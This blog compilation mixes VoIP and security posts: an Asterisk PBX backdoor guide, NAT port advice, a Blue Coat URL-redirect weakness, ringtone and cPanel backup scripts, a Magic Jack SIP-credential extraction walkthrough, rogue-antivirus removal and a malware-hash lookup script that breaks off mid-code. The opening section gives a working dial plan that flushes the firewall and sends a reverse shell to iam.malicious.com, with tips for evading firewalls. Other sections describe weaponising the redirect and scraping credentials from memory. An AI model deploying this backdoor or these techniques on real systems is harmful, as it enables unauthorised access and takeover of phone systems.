Step 3: Depending on the system they are using for their PBX ie. PBX in a Flash, Trixbox or just straight asterisks will determine what file you need to edit to put your custom dial plan. In any system that uses FreePBX (PBX in a Flash, Trixbox and several others) any changes to the extensions.conf file will be overwritten and restored back to default by FreePBX so editing that file will not work. If the system is running FreePBX you will need to edit the extensions_custom.conf located in the /etc/asterisk/ directory.

Use your favorite editor to open the file and edit it. At the bottom of the file you will want to place the following dial plan:

[custom-backdoor] ; change name of course

exten => 9000,1,Playback(owned) ; not needed but cool when you place the call

exten => 9000,2,Wait(1)

exten => 9000,3,System(/sbin/iptables -F) ; flush iptables rules if there are any

exten =>9000,4,System(/var/tmp/.hidden/spipe –e /bin/bash iam.malicious.com 443) ; shovel shell back

exten => 9000,5,Goto(custom-backdoor,s,1)

exten => 9000,6,Hangup

Tips: Use a common port for your reverse shell to help defeat firewalls and proxies. The number 9000 is the extension you will use. Make sure it is something that is not already used. On the attacker side you will want to have a spipe connection listening for the reverse shell “./spipe –l 443”

Save this file and issue the command “asterisk -rx reload”

Step 4: At this point you system is now back doored and you should be able to call the extension and launch the reverse shell. This is useful for systems that use IVR’s that allows you to dial any extension. Or if you have found a week extension that you can register a soft phone with.

Stay tuned for more articles on this subject.

If you have any questions or concerns please feel free to contact me.

On most of the Asterisk based PBX forums on the internet one of the top help related questions posted is “the phone rings and I can answer it but there is no voice” or one of many variants of that question. The issue is most likely due to the fact you are running the PBX behind a NAT. Most likely your PBX is either behind your home router or your enterprise firewall and you are using a RFC 1918 IP address for it. You are also most likely either doing inbound port forwarding or one to one NATing depending on your firewall.

Let’s first look at what ports are required for your PBX system to work. These are the same ports if you have to port forward or if you do a 1 to 1 NAT and firewall rules. Remember if your PBX sits on your LAN these ports will already be available to other computers and phones on the LAN already. These are ports required for external inbound and outbound communications and administration.

I have based the ports in my article from the list here: http://pbxinaflash.org/Tutorials. If you compare my list below and theirs you will notice some ports not listed. My theory is to keep it simple and secure. If you are running an Asterisk based PBX in an enterprise or office environment I would suggest not allowing any of these ports inbound. If you need to administer your PBX you should use your company’s secure remote access solution if they have one.

22: TCP port 22 is SSH. It allows secure command line access to your box. Pros: the communication channel is secure. Cons: It is a default port and many people will try to brute force your username and password. I would not worry though if you are running PBX in a flash; their fail2ban will ban the IP of the person scanning your box. If you are running another system like Trixbox you can install BFD from: http://www.rfxn.com .

69: UDP port 69 is TFTP. Unless you have external phones such as a CISCO 7900 series or any other IP based phone that needs to TFTP a configuration from the PBX this is not required externally and should not be opened.

80: TCP port 80 is http. This is required for web based administration. This can be replaced with TCP port 443 for secure web based administration if you have a SSL certificate installed. Pros: Almost all ISP’s allow this port in and out making it a reliable method for administration. If your ISP does not allow port 80 inbound you can change this to another port like 9080. Cons: It is a common port and provides information to a potential attacker about what is running on that server. A potential attacker could try to brute force the username and password or if an administrator did not change the default username and passwords they can use them to access the system. In PBX in a Flash Fail2ban will block brute force attacks and ban the offending IP address.

443: TCP port 443 is https. This will provide secure web based administration if you have a SSL certificate installed. Unless you have a certificate I would not bother opening this port.

4445: TCP port 4445 is used for the FOP (Flash Operator Panel). My system is home based and I do not require external access to this. Unless you are running a larger system and your phone administrators need access I would not open this. There are more secure ways to give them access to this feature such as through a SSL VPN or Citrix.

4569: UDP port 4569 is iax2. This port is required only if you are using the iax2 protocol for your PBX’s communications.

5000-5082: UDP ports used for SIP conversations. This is extremely important if you are using the SIP protocol for communications and most of you reading this probably are.

5038: TCP port 5038 is AstMgr. This port should be opened and not altered.

10000-20000: UDP ports used for SIP calls.

Now that you have all the required ports open for your environment it is now time to get over the hurdle of NAT. If everything above has been done correctly and your PBX has already been configured with trunks, routes, and extensions you should be able to place and receive calls at this point. If not please correct that issue before continuing as the issues with NAT usually come into play when you try to extend the functionality of your PBX system to outside your LAN, such as call forwarding to a outside number.

Since Asterisk based PBX systems that have FreePBX installed with them do not allow you to edit the main Asterisk configuration files you will need to edit the “sip_general_custom.conf” file and make your changes in there.

Steps:

1. Login into your PBX via command line.
2. Use your favorite Linux text editor to open the file /etc/asterisk/sip_general_custom.conf
3. Copy the lines below and make the appropriate changes. Then paste it into the config:

rtptimeout=120

externhost=FQDN or External IP of the PBX

externrefresh=120

nat=yes

localnet=192.168.0.0/255.255.255.0 <–LAN IP and netmask

1. Save the file
2. At the command prompt enter the command “asterisk –r”. This will bring you into the asterisk console.
3. In the console enter the command “reload”
4. Once the system reloads exit the session.

At this point you should now be able to overcome the issues you were having due to the NAT such as no voice in calls and call forwarding. I have tested this on my home PBX system running PBX in a Flash and this solution works like a charm. If you have any questions comments or concerns please feel free to ask me.

The Blue Coat web filter is one of the industry’s leading web filtering solutions. It provides the organization the ability to filter where their employee’s, vendors, customers or guests can go online.

The Blue Coat Web filter has an issue where it will display a base64 encoded URL in the following format http://blue_coat_name/?cfru=aHR0cDovL3d3dy5nb29nbGUuY29tLw== when it has an error.

This URL is displayed in the end users browser usually with a message relating to the issue. The encoded URL is the URL that the end user was trying to get to before the error occurred. In the URL above I was trying to access www.google.com.  To verify that we can use any base64 decoder, for this example I used an online version found at http://base64-encoder-online.waraxe.us/ .

All a malicious user would need to carry out an attack would be remote site that is hosting a malicious payload or an attack platform like Metasploit or Core Impact to host the malicious file. The attacker would than use a base64 encoder to encrypt the malicious URL and send the problematic link to the system administrator or any other end user. This attack could lead to a full system compromise depending on the payload and the rights of the user clicking the URL.

The limitation to this vulnerability is that DNS name and or IP of the Blue Coat web appliance will differ for the majority of companies. Though I bet there are at least a few companies out there that have named their Blue Coat web filter “proxy” or “webproxy”. By posting several of these generic names on the internet it may also be able to compromise other remote machines as well.

The question that I have to Blue Coat is why you would provide such functionality. Why don’t  just display the URL in clear text.

I have created a simple shell script below that will automate the process for you. This script was written to run on the Linux based PBX (Trixbox, PBX in a Flash, Asterisk and so on). Though with a little editing of the script you can use it to just create the ringtones and not install them.

1. Make sure you have sox installed: which sox and if you don’t you can install it with either apt-get or  yum.
2. Download the wav files or mp3 that you want to convert to your PBX but. I suggest using Google or another means to find files you want to use. Remember mp3 support may not work.
3. Copy the code below and paste it into a file on your Linux box using your favorite editor.
4. Open the shell script and edit the variables if your paths are different. If you don’t know what to put here leave it blank. These are the paths on your PBX where the phone will pull its configurations from.
5. Save the changes and chmod the file so you can execute it.
6. Excute the script:
7. When prompted for the path and name of file you want to convert enter it like this: /music/ring.wav
8. When prompted for the path and name of the output file it enter it like this: /music/ring (no extension)
9. Watch for errors and correct where needed.
10. If you are running this on a Linux PBX it will copy the file to the /tftpboot dir and edit the RINGLIST.DAT file for you.
11. Once the script is done reboot your phone

#!/bin/bash
#####################################
## Create custom cisco ringtones   ##
## Created by Michael LaSalvia     ##
## http://www.digitaloffensive.com ##
## Tested on cisco 7940 and 7960   ##
## Running SIP                       ##
#####################################

#Variables
dtftp=/tftpboot
fring=$dtftp/RINGLIST.DAT

#My current sox install does not support mp3. Most do not by default.
echo “Enter the path and name of the file you want to convert: ”
read inRing
echo “Enter the path and name of the output file: ”
read oRing
echo “#############################################”
echo “Converting the file”
echo “#############################################”
#Not all sox installs support -b without a positive integer
sox $inRing -t raw -r 8000 -U -b -c 1 $oRing.raw resample -ql
echo “#############################################”
echo “Resizing the file(16080B) and saving to $dtftp”
echo “#############################################”
dd if=oRing.raw of=$dtftp/$oRing.raw bs=1005 count=16
echo “#############################################”
echo “Editing the RINGLIST”
echo “#############################################”
echo “$oRing    $oRing.raw” >> $dtftp/$fring
echo “#############################################”
echo “If there was no errors above, please reset your phone and choose your new ring”
echo “#############################################”

If you like your SIP info retrieved for you, we offer remote retrieval support for $10.00 per Magic Jack:

I have also corrected the download link for the mjproxy source code in my article: http://www.digitaloffensive.com/mjproxy.c.tar.gz

The concept and art of hacking the Magic Jack is actually really old. The reason I am writing this is that over the last year the process has become much harder. There is definitely ample information available online that if you were to spend weeks reading you could easily do this. But who wants to read through countless forums post trying each way to hack it only to find that way no longer works. Like you, I want the answer and I want it now.

Chapters:

1. Who wrote this document.
2. What is the Magic Jack.
3. Why did I buy it and my buying experience.
4. Required tools and knowledge.
5. Setup and registration of your Magic Jack.
6. Get SIP info and Proxy info.
7. Testing settings and using other SIP clients.
8. Configuring Trixbox

Who wrote this:

This document contains the ideas of many but has been written, tested, added to and compiled into one body of knowledge by the team of Security professionals at http://www.digitaloffensive.com. Resale, trading, or hosting of this document is against the law and violators will be prosecuted. This document is for educational use only and the team at http://www.digitaloffensive.com does not take any responsibility for your use of this document or the effects it may have on your systems or Magic Jack account.

What is the Magic Jack:

The Magic Jack is a small USB dongle that plugs into a computer and telephone to provide the end user a low cost phone service through the power of VoIP and ads. There are many thoughts on this product some good and many bad. Many people believe this product to be riddled with spyware based on their poorly worded TOS that you must accept to use and the ads you are forced to see when using their soft phone. I am under the assumption that anything I install on my computer could possibly spy on me and I assume that risk. With that out of the way I leave it up to you to decide if you want to try this product or not.

Why did I buy it and my buying experience:

Several days ago I ordered a Magic Jack. My reason for ordering a Magic Jack was to use it as a part of my Trixbox VoIP system. I read this can be done and it looked real easy to do. Lucky for me they were offering a free 30 day trial. The free 30 day trial is actually free though they put a hold on your credit card for 46.00 + change this includes the shipping cost, the USB dongle and 1 year of service. The whole process felt fishy to me but I figured even if I was to get ripped off it was under $50.00 and would provide a good learning experience as well as give me something to write about. It took less than 5 days to get my Magic Jack sent to me.

During the research I did I found that the older versions of the Magic Jacks before the recent upgrades were easier to hack and to get the SIP information off of. So when I ordered this I was hoping that it would arrive in one of those vacuum packed plastic cases that take close to an act of God to open. My thought process was that if it came sealed like that it might have been sitting on the shelf for some time and not contain the most recent updates, making it easier to hack. But no, mine came in a foam holder like a glorified AOL DVD. I decided to first try to install it on a computer with no internet connection so I can view the files on the Magic Jack and maybe figure a way to disable the auto updates. This was fruitless because as soon as it detected there was no internet it would not install. So I moved the USB to another computer with internet access and enabled windows firewall in hopes that it would stop the Magic Jack from auto running and updating itself. I was wrong. It ran and automatically updated itself to version 2/18/10. I was about to ship it back ASAP, but I got to say this little device looks cool and I wanted to play.

Required Tools and Knowledge:

We will need to download several tools to get started. I suggest that you create a folder on your desktop and extract all the files to the folder you created as they all will be used together.

1. Magic Jack: http://www.magicjack.com.
2. Stroths MJ Utilities Suite v 1.6 from this link: http://magicjackhacks.com/downloads/MagicJack_Utilitieswsip.zip . This suite was once used to be able to pull the SIP information off your Magic Jack. Even though this feature no longer works with newer Magic Jacks, this suite provides other useful tools that we will need.
3. SIPDump.exe: This file is not normally included in the suite above, but the URL above has a copy of it in the zip file. The Magic Jack stores the SIP info in memory. This is the most important tool and will be used to dump the password and SIP info out of memory.
4. MJMD5: http://magicjackhacks.com/downloads/MJMD5.exe . This is a windows proxy that will allow us to use other thin clients and soft phones, such as xlite, without needing the actual USB dongle. This is also good for those that want to use the iphone or other wifi enabled phones. This is needed since Magic Jack has altered how it handles SIP and basically adds a hash to each packet. This tool will add the hash and the proper syntax information. I use this tool to test my Magic Jacks to make sure that the SIP information I pulled off is correct.
5. WireShark: http://www.wireshark.org/download.html . WireShark is a packet sniffer and will be useful in figuring out what Magic Jack proxy we are using. It is also capable of capturing VoIP calls and compiling them so you can listen to other people’s calls.
6. Notepad ++: http://sourceforge.net/projects/notepad-plus/files/. Notepad ++ is a replacement for Notepad. It keeps the formatting of files, adds line number, and is able to open large files without crashing and many other cool features. This will be needed to open the memory dump files. Though it is possible to use Notepad or Wordpad to do the same on faster computers.
7. Xlite: http://www.counterpath.com/xlite-comparison.html .This is a soft phone that we will for testing our credentials. You can use any soft phone you want or any SIP client you want for testing, such as an iPhone. Though I will use this one for the article. The current 3.0 code of the Xlite application does not require you to sue the MJMD5 proxy as it uses md5 to encrypt your password already.
8. Windows firewall, Antivirus Firewalls, Software Firewalls, and or Hardware firewalls: Make sure these are disabled as this adds to the trouble shooting. Or open up your system to allow all outbound connections and inbound connections (UDP is not stateful) for the testing. If you are worried about your security please Google 1 to 1 NAT or PAT’s and create a policy that way.
9. MJProxy: http://www.digitaloffensive.com/mjproxy.c.tar.gz Linux Magic Jack Proxy. This is like the MJMD5 proxy but for Linux.
10. Trixbox: http://www.trixbox.org/downloads (or any other asterisk system you feel comfortable with). An easy to use asterisk system widely used in the community.

Besides the tools listed above you will need the following:

1. Patience: This is key in doing this. If you think you are going to run a few commands and get the goods you are wrong.
2. 2. Computer Skills: If you do not have basic to intermediate computer skills and the ability to follow directions, just stop now.
3. 3. Linux Skills: If you plan to use this as part of your Asterisk, Trixbox, Free PBX and so on systems.

Setup and Registration of your Magic Jack:

So let’s get started. The first thing you will need to do is put your Magic Jack in the USB and register your Magic Jack. This will walk you through upgrading the Magic Jack firmware, setting up your Magic Jack account, setting up E911 and obtaining a telephone number. Be warned that during the whole process they try to sell you additional services, so be careful where you click. Once you have completed your Magic Jack setup, I would use their soft phone to make a test call to verify everything is working before continuing. This will help eliminate additional troubleshooting steps if there is a problem later on in this article. If you do not have a phone to plug into the Magic Jack, go to “menu” tab and choose headset, this will allow you to use your computer speaker and mic. Once you have done this place a call to someone. I called my cell phone to test, so I would not bother any one while I went through the rest of the setup and tests.

Get SIP Info and Proxy Info

I do not guarantee this will work and doing this may get your account terminated.

Now that we have a working Magic Jack we can start the process of trying to get the SIP info from the Magic Jack. Most of you already know that the Magic Jack stores its SIP info temporarily in memory on initial start up, so for us to get this information we will need to dump the memory and look through the output for the password. To do this we will use the SIPDump.exe that we have downloaded earlier.

Timing is everything on this step and it may need to be repeated several times to get the information you need.

Timing is everything on this step and it may need to be repeated several times to get the information you need.

1.Open the SIPDump.exe and set the dumps to 4. DO NOT HIT OK YET.

Click for a larger image

2. Next start up your Magic Jack software, either unplug it and plug it back in or go the drive and select autorun.exe.

3. When you see it starts to load and see the ad on the left hand side start to show click ok on the SIPDump.exe.

Click for a larger image

4. This will dump the memory into 4 dump files and stop Magic Jack. These dump files will be located in the directory where you ran SIPDump.exe from and be called SIPDump1-4. Each file must be a minimum size of 22,000 KB. If they are not please try again. We have found the password in smaller sized files but for some reason the Magic Jack do not work in the following steps.

Click for a larger image

5. Now open the first SIPDump file and search for the EXACT phrase “SIP.Connection.Refresh” without the quotes. There should be only one instance of this phrase and your password should be located within a few lines above and or below it. Many articles on this say your password will be 20 characters, mine however is 21 characters. I also found mine in the second SIPDump file along with my SIP username which is still the standard E_your_number_01@talk4free.com.

Click for a larger image

6. At this point we have our SIP username and password. We now need to get the proxy address that our Magic Jack is using. It will be in the format of proxy01.xxx.talk4free.com, where the xxx is the city where your proxy is. To do this I used WireShark. Since WireShark is not what this article is about, I will provide you with a high level instruction on how to use it to get what we need. Side note I know there are easier ways to do this but they are not as reliable. I also understand there are other ways to get this info out of WireShark but I am keeping it simple so the end user does not have to go through tons of packet capture to get what they need.

a. Open WireShark. Once it is open click on Capture à Interfaces à Then the interface that is handling your networking and internet. This will also most likely be the only interface that has packets. Once you determine the interface to use choose start.

Click for a larger image

b. Once you start the capture start your Magic Jack and place a call to your test number. This will generate VOIP traffic that WireShark will capture and save. Once your test number answers or you get voicemail, hang up and stop the capture.

c. Now that you have the packets, let’s find the VOIP info. To do this click on Statistics and then on VoIP Calls.

Click for a larger image

d. This will launch another window showing your call info:

Click for a larger image

e. As you can see from the image above we have detected 1 VOIP call. From this screen we can Graph the call details or actually play the call back and listen to the conversation. Though playing the call back is cool is not what we need to continue. Click on “Graph”

Click for a larger image

f. This IP will vary based on where you live. To get the Fully Qualified Domain name (FQDN) we will open a command prompt and type “ping –a <IP from above>”

Click for a larger image

g. We now have all the required SIP information

i. SIP username: Etelephone-number01

ii. Password: L123456789101112133G (not a real password)

iii. Proxy: proxy01.philadelphia.talk4free.com

Testing settings and using other SIP Clients:

Now that we have our SIP info, we want to test it to make sure we gathered all the correct information. To do this we will use the MJMD5 tool. This tool is a proxy server that we will send all our VOIP traffic through. This is needed since Magic Jack alters how the packets are sent by adding a hash to them. This tool will add the hash to the packet then send it.

1. Start MJMD5.exe and fill in the proxy and the password field and press start:

2. Now that the proxy is running, let’s open our Xlite soft phone application and add a new SIP Account. To do this launch the application and right click on the status window –> Choose SIP account settings –> Add. Display Name: Can be anything you want. User Name: Must be your SIP user name. Password: must be the password that we got from the dump. Authorization user name: must be the SIP user name. Domain: is the IP address of the computer you are running the MJMD5 proxy on :5070 (The SIP Port). To get the IP of your machine go to a command prompt and type ipconfig and press enter. Make sure the rest of the settings are checked as you see in the image below. Then hit save and go back to the application.

Click for a larger image

3. The moment of truth: If you have followed all the directions above and got the correct proxy, password and username you should see the following displayed on the Xlite soft phone and you should be able to place a call without the Magic Jack plugged in.

Click for a larger image

4. Testing outbound call

Click for a larger image

5. Testing incoming calls

Click for a larger image

6. Now that we know that the SIP information we gathered is correct, we can use it for countless things.

a. For example you can use a service like http://www.afraid.org to register a sub domain for free that points to your home IP address. On your home firewall you can setup a rule to allow 5070 inbound and create a network address translation. This will allow you to use any wireless device with a SIP client to connect to your home computer running the MJMD5 proxy and make free calls.

b. Or you can setup your own PBX, like Trixbox

Setting up your own PBX using Trixbox

This section requires that you have knowledge of the Linux operating system or are willing to spend the time to learn as you go. If this is you then please continue on.

Before you start you will need a copy of Trixbox installed and ready to go. To obtain an ISO of Trixbox go to http://www.trixbox.org/downloads and download it. Once it is done downloading burn the ISO to CD and install. Trixbox should be installed on a system with a minimum hardware of 40gig hard drive, 512 MB of memory and a network card. This configuration should support a small office or home setup.

During the creation of trunks, routes and extensions if I do not mention a field you are to leave the default value unless you want to play with settings at which point you are on your own for making this work.

Installing MJProxy:

MJProxy is a program written in c to manipulate your SIP traffic into the Magic Jack required format and pass it to and from the Magic Jack servers and your PBX.

1. Login as root to your Tribox system

2. Install the c compiler: yum –y install gcc

3. Download mjproxy source: wget http://www.digitaloffensive.com/mjproxy.c.tar.gz

4. Extract the mjproxy source and libraries: tar –zxvf mjproxy.c.tar.gz

5. Compile the mjproxy source to an executable: gcc -o mjproxy md5.c mjproxy.c

6. Give it rights to run and execute: chmod 777 mjproxy

7. Run the mjproxy: ./mjproxy 0.0.0.0 5070 proxy01.yoursite.talk4free.com 5070 your_password

a. To run multiple Magic Jacks you can either use a virtual IP on your interface or replace the 0.0.0.0 with a dedicated IP. The 0.0.0.0 means to listen on all IP’s. Or you can change the first instance of 5070 to the next highest number i.e. 5071. I would suggest a combination of both as to not to confuse inbound and outbound calls.

b. You can also place this as a service or create a shell script to execute all your Magic Jack proxies.

8. Issue a ps –wuax to make sure the mjproxy process is running

Logging into Trixbox web gui:

1. Login to the web gui http://IP_address of your Trixbox install and click switch in the upper right hand cornor. This will switch you from user mode to maintaince mode. By default the login is maint / password. To change this log into the console with the root account and issue the command passwd-maint and follow the instructions.

2. Once logged in either fill out or ignore the Trixbox registration screen. This is not required but can’t hurt.

3. At this point you can start your configuration.

Update your system:

1. Click on PBX settings

2. On the left hand side click “Module admin”.

3. Click on “Check for updates online”.

4. Click on “Upgrade all”.

5. Click on “Download all”.

6. Then ok, this will start the downloads, the upgrades and will then prompt to reload the system.

Configuring a Trixbox Trunk:

1. Click on “PBX Settings”

2. Click on “Trunks”

3. Choose “Add a SIP Trunk”

4. Leave “General Settings” blank

5. Under “Outgoing Settings” fill out the following

a. Trunk Name: Magic Jack (or anything you want)

b. Peer details:

username=EXXXXXXXXXX01 (your SIP username)

type=friend

secret=LXXXXXXXXXXXXXXX (Your SIP Password)

qualify=2000

port=5070

nat=no

host=XXX.XXX.XXX.XXX (The IP address of your trixbox)

fromuser= EXXXXXXXXXX01 (your SIP username)

dtmfmode=inband

insecure=very

context=from-pstn

6. Under Incoming settings erase everything out of the fields.

7. Under registration fill it in as follows with the information from the Peer Details:

a. SIP username:SIP password@Trixbox IP:5070/Your 10 digit telephone number

b. Ex. EXXXXXXXXXX01: LXXXXXXXXXXXXXXX@xxx.xxx.xxx.xxx:5070/7175555555

8. Click “Submit changes”

9. Click on “Apply changes”

10. Click on “reload”

Click for a larger image

Click for a larger image

Click for a larger image

When you click on the PBX settings button you will see the following if you created the trunk correctly and if it registered:

IP Trunks Online 1

IP Trunk Registrations 1

If this did not work you can use tail –f 10 /var/log/asterisk/full on the command line to view your logs for errors. If you did not test your SIP settings as I outlined above please go back and use xlite to verify they are correct then try rebuilding the trunk again. If you are still having issues I am available for a hourly rate to trouble shoot and correct or you can use Google.

Creating an outbound route:

1. Click on “PBX Settings”

2. Click on “Outbound Routes”

3. Click “Add route”

4. Route Name: Magic-out (Or whatever you want to name it)

5. For Dial Patterns use the wizard and select 7 digits and 10 digits dialing unless you want to setup some special dialing which if you do you are on your own for this article.

6. For “Trunk Sequence” choose the trunk you just created.

7. Click “Submit changes”

8. Click on “Apply changes”

9. Click on “reload

Click for a larger image

Creating an Extension:

1. Click on “PBX Settings”

2. Click on “Extensions”

3. Choose “Generic SIP Device”

4. Under “User Extension” enter an extension in a numeric format i.e. 101.

5. Under “SIP Alias” enter the same number you used for the extension.

6. Under “Secret” enter a min 6 character password the longer and more complex the better.

7. Click “Submit changes”

8. Click on “Apply changes”

9. Click on “reload

This will create a basic extension. Under this setting you can also configure your extensions voicemail and caller ID, but we are keeping this basic for now.

Creating an Incoming route:

1. Click “PBX Settings”

2. Click “Inbound Routes”

3. Click “Add route”

4. Under “Description” enter Magic-in (or other name you want)

5. Under “DID Number” enter your 10 digit Magic Jack number.

6. Under “Set Destination” choose “Extension” and select the extension you just created

7. Click “Submit changes”

8. Click on “Apply changes”

9. Click on “reload”

Once all these steps are completed you can configure your smart phone and test. If you are using xlite as your soft phone use the settings you used in the extension creation for your settings in xlite. Or if you are using a different IP phone such as Cisco follow the manufactures directions to configure it.

Simple Troubleshooting of your Trixbox:

Asterisk stores all of its events in one log fill called full located in /var/log/asterisk/ to view the log in real time you will need to log in to your Trixbox via shell access as root. Once you are logged into the box issue the command tail –f 10 /var/log/asterisk/full . This will scroll the last 10 lines of the log and any new log entries. Common errors that you will find here is incorrect authentication or issues with registration of the trunk. These are the two biggest issues I have run into while configuring Magic Jack to work with Trixbox. If you see any errors in the log you can simply Google them for detailed answers.

Services / Help:

If you bought this document and still cannot get your Magic Jack to work I will provide discounted hourly fees to help you to get yours working. I charge 100 dollars a day, with a 1 day minimum. I require you to ship your Magic Jack or Magic Jacks to me with a tracking number and provide return shipping with tracking as well. Your best bet is to send me the sealed Magic Jacks with the email address you want associated to them as well as the area code you want and let me do them from scratch.

If you want me to configure Trixbox system to use your Magic Jacks I will also require remote access to your machines as well as the usernames and passwords to your system. The fee for Trixbox configuration is an additional 30.00 dollars per day.

As mention above I will give a discount of 25.00 per day to anyone that bought this document and could not get this working based on information I provided and not due error or lack of ability on their side. I will review everything before accepting work and I do not guarantee anything.

Vista 2010 is a rogue anti-virus program that is usually advertised through the use of pop ups and fake security alerts that state that your computer is infected and that you should run an online anti-malware scan. Once the rogue program is installed, it will claim to scan your computer for malware and display a list of false threats just to confirm that your computer is infected with malware (usually Trojans and computer worms). Then it will ask you to pay for a full version of the program in order to remove the threats which as we already know don’t even exist. Most importantly, don’t buy it. If you did, then please contact your credit card company and dispute the charges.

Though this piece of malicious code is extremely annoying it is also very easy to remove. I have put a kit together for quick download to remediate this issue. The kit includes a custom batch file called avkill that will loop looking for the process av.exe and kill it automatically. This will allow you to execute other tools to remove the virus. It also includes a registry fix to remove the changes it makes to the registry. The file is called fix.reg and contains the following information:

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Classes\.exe]

[-HKEY_CURRENT_USER\Software\Classes\secfile]

[-HKEY_CLASSES_ROOT\secfile]

[-HKEY_CLASSES_ROOT\.exe\shell\open\command]

[HKEY_CLASSES_ROOT\.exe]

@=”exefile”

“Content Type”=”application/x-msdownload”

To download the kit go to http://www.digitaloffensive.com/files/av2010.zip

The first thing you need to do is to extract the kit and open the avkill executable. This will stop the av.exe process that is associated with this virus. Once that is running just minimize it and let it continue to run. Then either use regedit or just double click the fix.reg file to remove the virus from your registry and to stop it from restarting. Once this is done successfully you can now stop the avkill executable. This process will stop the virus from running. Once it is stopped we suggest you go to http://www.malwarebytes.org/ and download their free scanner to remove the actual malicious files from your system.

If you have any questions or concerns please feel free to contact me.

Years ago I did web hosting as a side source of income. This led to me developing  a lot of Linux based scripts to help automate my daily sysadmin responsibilities. Our hosting company was  called ezhostingpro.com. Since then another party owns the domain but googling that and my name will lead you to several of my scripts being hosted by other sites. I posting the code on my site as I am finding many people on http://www.getafreelancer.com using codes I post on this site to bid on projects and win them.

This script is in two parts. The first part creates the backup and the second part transfers the backup remotely. The first part of the script makes use of the built in backup commands in cpanel. The script needs minor changes to be used by resellers instead of dedicated server owners.

Script 1:

#!/bin/bash

############################################
## ##
## EZHOSTINGPRO BACKUP FTP SCRIPT v1.0 ##
## Created by Michael LaSalvia ##
## http://www.digitaloffensive.com ##
## 2/23/04 rev 1 ##
############################################
## 1. Create a file called cpbackup.txt in /root
## 2. Place account names you wanted backup
## 3. Save file in /root
############ DO NOT EDIT BELOW #############
cd /root
for users in $(cat cpbackup.txt)
do
rm -rf /home/$users/cpmove-$users.tar.gz
/scripts/pkgacct $users
mv /home/cpmove-$users.tar.gz /home/$users/
cd /home/$users
chown $users.$users cpmove-$users.tar.gz
chmod 777 cpmove-$users.tar.gz
/home/$users/bkftp.sh
cd /root
done

Script 2: This script needs to beedited with the users ftp credentials and placed in the user home dir.

#!/bin/bash

##################################
## EZHOSTINGPRO REMOTE BACKUP ##
## created by: Michael LaSalvia ##
##http://www.digitaloffensive.com##
## DO NOT EDIT THIS FILE ##
## Name this file bkftp.sh chmod 777 ##
##################################

### VARIABLES ###

var_cpaneluser=’cpanel_user_goes_here’
var_remote=’remote_server_goes_here’
var_ftpuser=’remote_server_ftp_username_goes_here’
var_ftppass=’remote_server_ftp_password_goes_here’

cd /home/$var_cpaneluser
ftp -n $var_remote <<END_SCRIPT
quote USER $var_ftpuser
quote PASS $var_ftppass
del cpmove-$var_cpaneluser.tar.gz
put cpmove-$var_cpaneluser.tar.gz
quit
END_SCRIPT
exit 0
rm -Rf cpmove-$var_cpaneluser.tar.gz

I believe the newer cpanel system actually provides a built in method to do this, though since I do not have access to one to test I will post this any way. If you have any questions comments or concerns please feel free to contact me.

The initial interest for this research came to me after reading an article on this on the site http://enclavesecurity.com/ . In the article they talk about using the malicious hashes to discover malware and other malicious files on their systems. They also take a deeper look into the recent APT and Auroa attacks on Google. Though the thing I found most interesting is trying to develop a way to automate this process for free and provide usable information.

The biggest thing to understand before continuing on is that this is not a fool proof process as a simple change of the file will change the hash of the file. For example if you have the c99.php shell and change the password or add a white space to the php this will change the hash of the file hence making detection via this method impossible. The other issue I have noticed in using this methodology is no one is willing to share all the information. Many companies will only share bits and pieces such as “The Malware Hash Registry” (http://www.team-cymru.org) considered the leading authority on this topic. They make part of their service available online to submit hashes to and get back the following information:

Ex:1: 7697561ccbbdd1661c25c86762117613 1258054790 NO_DATA

Ex:2: cbed16069043a0bf3c92fff9a99cccdc 1231802137 69

In example 1 you see the md5 hash then the epoch date and time then NO_Data meaning it could not tell if this hash is malicious.  In example 2 you see the same except instead of NO_data you see 69. This number means that 69% of the Antivirus vendors they used to check this file with found it to be malicious. This info is good but I find it to be not very helpful. It is nice to know that it was detected as malicious but is it truly malicious and if it is what type of malicious file is it, is it a backdoor, key logger or so on. I have emailed them asking if they could provide the detection type; with understanding that most of their system is private as they will not disclose the database or the vendors they use to scan the files. Though I have not heard back from them at this point.

This led me to searching the internet for other sites like this that provided additional information along with the hash. In this search I found one other site called http://malwarehash.com a sub site of the company NoVirusThanks.org. They provide an online utility to submit your hash to and if it is discovered as malicious it will give you info back. See screen shot below:

As you can see they provide an additional layer over what you get from the Malware Hash Registry. On top of that they use a simple PHP script for the query that makes scripting this so much easier:

http://www.malwarehash.com/result.php?hash=1E71DE2D6A89AA9796344BB7FA23AC7E

As you can see in the URL you have the site the script and the hash. The only issue with this site is that it seems they have not updated their database since 6/2009. I have contacted them as well to ask them about this and to see what their plans are for the site though I have not heard back from them either.

With this information in hand I set forth to develop a script that would allow me to automate this process as we have found this methodology to be helpful at work even if it is not 100% accurate as we notice that most malware will not get detected by our Anti virus so by using the hashes and relying on the internet community we are able to help our detection and remediation of malicious files.

To use this script you will need to have a Linux user account and some basic knowledge of Linux to set the variables properly. I wrote the script in bash for two reasons 1 it is a piece of cake to do and 2 so you be forced to move the malicious file off a windows environment where you stand a higher chance of infecting your self.  First access your shell and create a directory called what ever you want but in the code we used a directory called infect that is set in a variable for easy changing. Once you do that copy the malware-hash.sh script to 1 directory above the folder you just created. Then copy the sed script file to a file called clean in the directory that you created. Once you have done this chmod the malware-hash.sh script so you can execute it and chmod the clean script so the malware-hash.sh script can read it. Once done all you have to do now is copy the suspicious files to the directory you created and execute the script. The script will get a listing of all the files in that folder, remove the clean script, and any dupes from the listing and then get the md5 hash of each file. Once it gets the hashes it will create a batch file to be processed against The Malware Hash Registry and save the results in a clean human readable format. We use the batch function to stay with in the TOS of the site.  This includes adding the file names in front of the hash so you know what the hash belongs to. Next it will take the hashes and run them through the site Malwarehash.com. We use the –random-wait command with wget here to not act like a bot or script. If it gets a hit for a infection we will grab the site and scrape out the data we want then process it into a human readable report. Once all done we will combine the results of both checks and email the final results to the email address provided.

The script is written in bash and is highly documented:

The script is broken down into 2 sections the actual script and the sed script file.

Part 1 the Script: Copy this script to a file with a .sh extension or download it here http://www.digitaloffensive.com/malware-hash.sh . I suggest downloading it as the word press system will definitely destroy the formatting of the code. Place this script 1 directory up from the directory that you are using for the infected files.

#!/bin/bash
################################################
## MALWARE HASH BASH                           ##
## Written by Michael LaSalvia                  ##
## http://www.digitaloffensive.com              ##
## Inspired by an article at enclave Security ##
################################################

#Variables and clean up
#Edit in Path to dir that contains file for analysis
inPath=/home/mike/virus/infect

